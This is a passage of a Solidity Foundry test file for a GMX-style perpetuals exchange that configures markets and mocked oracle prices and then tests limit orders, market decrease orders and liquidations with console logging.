_dataStore.setUint(Keys.minCollateralFactorForOpenInterestMultiplierKey(_marketProps1.marketToken, true), 1e25);\\n _dataStore.setUint(Keys.minCollateralFactorForOpenInterestMultiplierKey(_marketProps1.marketToken, false), 1e25);\\n \\n // see fees for the market\\n _dataStore.setUint(Keys.swapFeeFactorKey(_marketProps1.marketToken), 0.05e30); // 5%\\n _dataStore.setUint(Keys.SWAP_FEE_RECEIVER_FACTOR, 
0.5e30);\\n _dataStore.setUint(Keys.positionFeeFactorKey(_marketProps1.marketToken), 0.00001234e30); // 2%\\n _dataStore.setUint(Keys.POSITION_FEE_RECEIVER_FACTOR, 0.15e30);\\n _dataStore.setUint(Keys.MAX_UI_FEE_FACTOR, 0.01e30);\\n _dataStore.setUint(Keys.uiFeeFactorKey(uiFeeReceiver), 0.01e30); // only when this is set, one can receive ui fee, so stealing is not easy\\n _dataStore.setInt(Keys.poolAmountAdjustmentKey(_marketProps1.marketToken, _marketProps1.longToken), 1);\\n _dataStore.setInt(Keys.poolAmountAdjustmentKey(_marketProps1.marketToken, _marketProps1.shortToken), 1);\\n _dataStore.setUint(Keys.swapImpactExponentFactorKey(_marketProps1.marketToken), 10e28);\\n _dataStore.setUint(Keys.swapImpactFactorKey(_marketProps1.marketToken, true), 0.99e30);\\n _dataStore.setUint(Keys.swapImpactFactorKey(_marketProps1.marketToken, false), 0.99e30);\\n\\n \\n \\n \\n // set gas limit to transfer a token\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_sol)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_wnt)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_usdc)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenA)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenB)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenC)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketProps1.marketToken)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsAB.marketToken)), 32000);\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsBC.marketToken)), 32000);\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsCwnt.marketToken)), 32000);\\n\\n\\n /* Configure the system parameters/limits here */\\n _dataStore.setUint(Keys.MAX_CALLBACK_GAS_LIMIT, 10000);\\n _dataStore.setUint(Keys.EXECUTION_GAS_FEE_BASE_AMOUNT, 100);\\n _dataStore.setUint(Keys.MAX_ORACLE_PRICE_AGE, 2 hours);\\n 
_dataStore.setUint(Keys.MIN_ORACLE_BLOCK_CONFIRMATIONS, 3);\\n _dataStore.setUint(Keys.MIN_COLLATERAL_USD, 1e30); // just require $1 as min collateral usd\\n _dataStore.setUint(Keys.reserveFactorKey(_marketProps1.marketToken, true), 5e29); // 50%\\n _dataStore.setUint(Keys.reserveFactorKey(_marketProps1.marketToken, false), 5e29);\\n _dataStore.setUint(Keys.fundingExponentFactorKey(_marketProps1.marketToken), 1.1e30); // 2 in 30 decimals like a square, cube, etc\\n _dataStore.setUint(Keys.fundingFactorKey(_marketProps1.marketToken), 0.0000001e30);\\n _dataStore.setUint(Keys.borrowingFactorKey(_marketProps1.marketToken, true), 0.87e30);\\n _dataStore.setUint(Keys.borrowingFactorKey(_marketProps1.marketToken, false), 0.96e30);\\n _dataStore.setUint(Keys.borrowingExponentFactorKey(_marketProps1.marketToken, true), 2.1e30);\\n _dataStore.setUint(Keys.borrowingExponentFactorKey(_marketProps1.marketToken, false), 2.3e30);\\n _dataStore.setUint(Keys.positionImpactExponentFactorKey(_marketProps1.marketToken), 2e30);\\n _dataStore.setUint(Keys.positionImpactFactorKey(_marketProps1.marketToken, true), 5e22); \\n _dataStore.setUint(Keys.positionImpactFactorKey(_marketProps1.marketToken, false), 1e23);\\n\\n // set the limit of market tokens\\n\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketProps1.marketToken, _marketProps1.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketProps1.marketToken, _marketProps1.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsAB.marketToken, _marketPropsAB.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsAB.marketToken, _marketPropsAB.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsBC.marketToken, _marketPropsBC.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsBC.marketToken, _marketPropsBC.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsCwnt.marketToken, 
_marketPropsCwnt.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsCwnt.marketToken, _marketPropsCwnt.shortToken), 1000e18);\\n \\n \\n // set max open interest for each market\\n _dataStore.setUint(Keys.maxOpenInterestKey(_marketProps1.marketToken, true), 1e39); // 1B $ \\n _dataStore.setUint(Keys.maxOpenInterestKey(_marketProps1.marketToken, false), 1e39); // 1B $\\n\\n _dataStore.setUint(Keys.maxPnlFactorKey(Keys.MAX_PNL_FACTOR_FOR_WITHDRAWALS, _marketProps1.marketToken, true), 10**29); // maxPnlFactor = 10% for long\\n _dataStore.setUint(Keys.maxPnlFactorKey(Keys.MAX_PNL_FACTOR_FOR_WITHDRAWALS, _marketProps1.marketToken, false), 10**29); // maxPnlFactor = 10% for short\\n // _dataStore.setBool(Keys.cancelDepositFeatureDisabledKey(address(_depositHandler)), true);\\n _dataStore.setBool(Keys.cancelOrderFeatureDisabledKey(address(_orderHandler), uint256(Order.OrderType.MarketIncrease)), true);\\n\\n addFourSigners();\\n address(_wnt).call{value: 10000e18}("""");\\n depositor1 = address(0x801);\\n depositor2 = address(0x802);\\n depositor3 = address(0x803);\\n\\n // make sure each depositor has some tokens.\\n _wnt.transfer(depositor1, 1000e18);\\n _wnt.transfer(depositor2, 1000e18);\\n _wnt.transfer(depositor3, 1000e18); \\n _usdc.transfer(depositor1, 1000e18);\\n _usdc.transfer(depositor2, 1000e18);\\n _usdc.transfer(depositor3, 1000e18);\\n _tokenA.transfer(depositor1, 1000e18);\\n _tokenB.transfer(depositor1, 1000e18);\\n _tokenC.transfer(depositor1, 1000e18); \\n\\n printAllTokens(); \\n }\\n\\n error Unauthorized(string);\\n // error Error(string);\\n\\n\\nfunction testLimit() public{\\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = 
IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(""Experiment 1 is completed.""); \\n \\n // console2.log(""PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP"");\\n \\n key = createMarketSwapOrder(depositor1, address(_wnt), 1e15); // create a deposit at block 3 which is within range (2, 6) \\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(""Experiment 2 is completed.""); \\n \\n\\n console2.log(""\\n\\n depositor 1 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 20e18, 1001e30, 106000000000000, true); // \\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(""Experiment 3 is completed.""); \\n \\n \\n\\n console2.log(""\\n\\n depositor 2 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 110e18, 13e30, 101000000000000, false); // 110 usdc as collateral\\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(""Experiment 4 is completed.""); \\n \\n\\n\\n console2.log(""PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP"");\\n vm.warp(2 days);\\n setIndexTokenPrice(priceParams, 98, 100); // send 20e18 USDC, increase $13.123 in a long position with trigger price 101\\n key = createLimitIncreaseOrder(depositor3, _marketProps1.marketToken, 
_marketProps1.shortToken, 23e18, 1.1234567e30, 101000000000000, true); // collateral token, usdsize, price\\n console2.log(""a LimitIncrease order created by depositor3 with key: "");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""\\n\\nExecuting the order, exiting moment// rest of code\\n\\n"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""Experiment 5 is completed.\\n""); \\n \\n\\n // depositor3 creates a LimitDecrease order\\n /*\\n setIndexTokenPrice(priceParams, 120, 125);\\n key = createLimitDecreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 120000000000000, 120000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(""a LimitIncrease order created by depositor3 with key: "");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""\\n\\nExecuting the order, exiting moment// rest of code\\n\\n"");\\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(""Experiment 7 for is completed.""); \\n */\\n}\\n\\nfunction testMarketDecrease() public{\\n \\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n 
mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(""Experiment 1 is completed.""); \\n \\n \\n \\n \\n console2.log(""\\n\\n depositor 2 deposit into marketProps1"");\\n key = createDepositNoSwap(_marketProps1, depositor2, 100e18, true);\\n _depositHandler.executeDeposit(key, priceParams);\\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor2);\\n printPoolsAmounts();\\n console2.log(""Experiment 2 is completed.""); \\n \\n \\n console2.log(""\\n\\n depositor 1 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 20e18, 1e25, 106000000000000, true); // \\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(""Experiment 3 is completed.""); \\n \\n \\n\\n console2.log(""\\n\\n depositor 2 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 110e18, 1e25, 101000000000000, false); // 110 usdc as collateral\\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(""Experiment 4 is completed.""); \\n \\n console2.log(""********************************************"");\\n\\n // deposit 2 will execute a marketDecreaseOrder now\\n key = createMarketDecreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 70000000000000, 5e23, false) ; // decrease by 5%\\n console2.log(""a market desced order created with key: "");\\n console2.logBytes32(key);\\n console2.log(""\\nExecuting the order// rest of code""); \\n setIndexTokenPrice(priceParams, 60, 65); // we have a profit for a short 
position\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(""Experiment 5 is completed.""); \\n\\n printAllTokens();\\n} \\n\\n \\n\\nfunction testLiquidation() public{\\n // blockrange (2, 6)\\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(""Experiment 1 is completed.""); \\n \\n \\n \\n \\n console2.log(""\\n\\n depositor 2 deposit into marketProps1"");\\n key = createDepositNoSwap(_marketProps1, depositor2, 100e18, true);\\n _depositHandler.executeDeposit(key, priceParams);\\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor2);\\n printPoolsAmounts();\\n console2.log(""Experiment 2 is completed.""); \\n \\n \\n console2.log(""\\n\\n depositor 1 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 10e18, 1e25, 106000000000000, true);\\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(""Experiment 3 is completed.""); \\n \\n \\n\\n console2.log(""\\n\\n depositor 2 createMarketIncreaseOrder"");\\n key = 
createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.shortToken, 100e18, 1e25, 101000000000000, false);\\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.shortToken, false);\\n console2.log(""Experiment 4 is completed.""); \\n \\n \\n\\n // deposit 2 will execute a marketDecreaseOrder now\\n key = createMarketDecreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.shortToken, 106000000000000, 5e23, false) ; // decrease by 5%\\n console2.log(""a market desced order created with key: "");\\n console2.logBytes32(key);\\n console2.log(""\\nExecuting the order// rest of code""); \\n setIndexTokenPrice(priceParams, 84, 90);\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.shortToken, false);\\n console2.log(""Experiment 5 is completed.""); \\n \\n \\n\\n \\n // depositor3 will execute a LimitIncrease Order now\\n key = createMarketIncreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 20e18, 200e30, 101000000000000, true); // collateral token, usdsize, price\\n console2.log(""a LimitIncrease order created by depositor3 with key: "");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""\\n\\nExecuting the order, exiting moment// rest of code\\n\\n"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""Experiment 6 is completed.\\n""); \\n \\n\\n // depositor3 creates a LimitDecrease order\\n setIndexTokenPrice(priceParams, 120, 125);\\n key = createLimitDecreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 
120000000000000, 120000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(""a LimitIncrease order created by depositor3 with key: "");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""\\n\\nExecuting the order, exiting moment// rest of code\\n\\n"");\\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(""Experiment 7 for is completed.""); \\n \\n // depositor3 creates a stopLossDecrease order\\n setIndexTokenPrice(priceParams, 97, 99);\\n key = createStopLossDecrease(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 95000000000000, 92000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(""a StopLossDecrease order created by depositor3 with key: "");\\n console2.logBytes32(key);\\n // Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n\\n console2.log(""\\n\\nExecuting the order, exiting moment// rest of code\\n\\n"");\\n _orderHandler.executeOrder(key, priceParams);\\n console2.log(""Experiment 8 is completed.""); \\n \\n \\n console2.log(""\\n\\n*************************************************\\n\\n"");\\n\\n\\n // depositor3 creates a Liquidation order\\n setIndexTokenPrice(priceParams, 75, 75);\\n console2.log(""Liquidate a position// rest of code"");\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n _liquidationHandler.executeLiquidation(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true, priceParams);\\n console2.log(""Experiment 9 is completed.""); \\n \\n\\n // printPoolsAmounts();\\n printAllTokens();\\n\\n \\n \\n \\n}\\n\\nfunction printAllTokens() startedCompleted(""printAllTokens"") public\\n{\\n console2.log(""\\nTokens used in this test:"");\\n console2.log(""_wnt: ""); 
console2.logAddress(address(_wnt));\\n console2.log(""_usdc: ""); console2.logAddress(address(_usdc));\\n console2.log(""_sol: ""); console2.logAddress(address(_sol));\\n console2.log(""_tokenA: ""); console2.logAddress(address(_tokenA));\\n console2.log(""_tokenB: ""); console2.logAddress(address(_tokenB));\\n console2.log(""_tokenC: ""); console2.logAddress(address(_tokenC));\\n console2.logString(""test contract address:""); console2.logAddress(address(this));\\n \\n console2.log(""_marketProps1 market token: ""); console2.logAddress(address(_marketProps1.marketToken));\\n console2.log(""_marketPropsAB market token: ""); console2.logAddress(address(_marketPropsAB.marketToken));\\n console2.log(""_marketPropsBC market token: ""); console2.logAddress(address(_marketPropsBC.marketToken));\\n console2.log(""_marketProps1Cwnt market token: ""); console2.logAddress(address(_marketPropsCwnt.marketToken));\\n console2.log(""\\n"");\\n \\n \\n}\\n\\n\\nfunction printMarketTokenAmount() public \\n{ console2.log(""Market token address: "");\\n console2.logAddress(address(_marketProps1.marketToken));\\n console2.log(""depositor1 market token amount: %d"", IERC20(_marketProps1.marketToken).balanceOf(depositor1));\\n console2.log(""depositor2 market token amount: %d"", IERC20(_marketProps1.marketToken).balanceOf(depositor2));\\n console2.log(""depositor3 market token amount: %d"", IERC20(_marketProps1.marketToken).balanceOf(depositor3));\\n}\\n\\nfunction printLongShortTokens(address account) public\\n{\\n console2.log(""balance for ""); console2.logAddress(account);\\n console2.log(""_wnt balance:"", _wnt.balanceOf(account));\\n console2.log(""usdc balance:"", _usdc.balanceOf(account));\\n}\\n\\n\\n\\n\\nfunction addFourSigners() private {\\n _oracleStore.addSigner(address(901));\\n _oracleStore.addSigner(address(902)); \\n _oracleStore.addSigner(address(903)); \\n _oracleStore.addSigner(address(904)); \\n}\\n\\n\\nfunction setIndexTokenPrice(OracleUtils.SetPricesParams 
memory priceParams, uint256 minP, uint256 maxP) public\\n{\\n uint256 mask1 = ~uint256(type(uint96).max); // (32*3 of 1's)\\n console2.logBytes32(bytes32(mask1));\\n\\n uint256 minPrice = minP;\\n minPrice = minPrice << 32 | minP;\\n minPrice = minPrice << 32 | minP;\\n\\n uint256 maxPrice = maxP;\\n maxPrice = maxPrice << 32 | maxP;\\n maxPrice = maxPrice << 32 | maxP;\\n\\n priceParams.compactedMinPrices[0] = (priceParams.compactedMinPrices[0] & mask1) | minPrice;\\n priceParams.compactedMaxPrices[0] = (priceParams.compactedMaxPrices[0] & mask1) | maxPrice;\\n}\\n\\n\\nfunction createSetPricesParams() public returns (OracleUtils.SetPricesParams memory) {\\n uint256 signerInfo = 3; // signer 904\\n signerInfo = signerInfo << 16 | 2; // signer 903\\n signerInfo = signerInfo << 16 | 1; // signer 902\\n signerInfo = signerInfo << 16 | 3; // number of singers\\n // will read out as 902, 903, 904 from the lowest first\\n\\n // the number of tokens, 6\\n address[] memory tokens = new address[](6);\\n tokens[0] = address(_sol);\\n tokens[1] = address(_wnt);\\n tokens[2] = address(_usdc);\\n tokens[3] = address(_tokenA);\\n tokens[4] = address(_tokenB);\\n tokens[5] = address(_tokenC);\\n\\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 64*4 for one element, so need two elements \\n uint256[] memory compactedMinOracleBlockNumbers = new uint256[](2);\\n compactedMinOracleBlockNumbers[0] = block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n\\n compactedMinOracleBlockNumbers[1] = block.number+1;\\n compactedMinOracleBlockNumbers[1] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n \\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 
64*4 for one element, so need two elements \\n \\n uint256[] memory compactedMaxOracleBlockNumbers = new uint256[](2);\\n compactedMaxOracleBlockNumbers[0] = block.number+5; \\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5;\\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5; \\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5; \\n\\n compactedMaxOracleBlockNumbers[1] = block.number+5; \\n compactedMaxOracleBlockNumbers[1] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5;\\n\\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 64*4 for one element, so need two elements \\n uint256[] memory compactedOracleTimestamps = new uint256[](2);\\n compactedOracleTimestamps[0] = 9;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 8;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 7;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 7;\\n \\n compactedOracleTimestamps[1] = 9;\\n compactedOracleTimestamps[1] = compactedOracleTimestamps[0] << 64 | 8;\\n \\n\\n // must be equal to the number of tokens, 8 for each, so 8*6= 48, only need one element\\n uint256[] memory compactedDecimals = new uint256[](1);\\n compactedDecimals[0] = 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n \\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 32 bits, so each 8 entries takes one element, we need 3 elements\\n // price table:\\n // SOL: 100 101 102\\n // wnt: 200 201 203\\n // USDC 1 1 1\\n // tokenA 100 101 102\\n // tokenB 200 202 204\\n // tokenC 400 404 408\\n\\n uint256[] memory 
compactedMinPrices = new uint256[](3);\\n compactedMinPrices[2] = 408; \\n compactedMinPrices[2] = compactedMinPrices[2] << 32 | 404;\\n\\n compactedMinPrices[1] = 400;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 204;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 202;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 200;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 102;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 101;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 100;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 1;\\n \\n compactedMinPrices[0] = 1;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 1;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 203;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 201;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 200;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 102;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 101;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 100;\\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 8 bits, so we just need one element\\n\\n uint256[] memory compactedMinPricesIndexes = new uint256[](1);\\n compactedMinPricesIndexes[0] = 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = 
compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 32 bits, so each 8 entries takes one element, we need 3 elements\\n // price table:\\n // SOL: 105 106 107\\n // wnt: 205 206 208\\n // USDC 1 1 1\\n // tokenA 105 106 107\\n // tokenB 205 207 209\\n // tokenC 405 409 413\\n uint256[] memory compactedMaxPrices = new uint256[](3);\\n compactedMaxPrices[2] = 413;\\n compactedMaxPrices[2] = compactedMaxPrices[2] << 32 | 409;\\n \\n compactedMaxPrices[1] = 405;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 209;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 207;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 205;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 107;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 106;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 105;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 1;\\n\\n compactedMaxPrices[0] = 1;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 1;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 208;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 206; \\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 205; \\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 107;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 106;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 105;\\n \\n \\n // three signers, 6 tokens, so we have 3*6 = 
18 entries, each entry takes 8 bits, so we just need one element\\n\\n uint256[] memory compactedMaxPricesIndexes = new uint256[](1);\\n compactedMaxPricesIndexes[0] = 1; \\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n \\n // 3 signers and 6 tokens, so we need 3*6 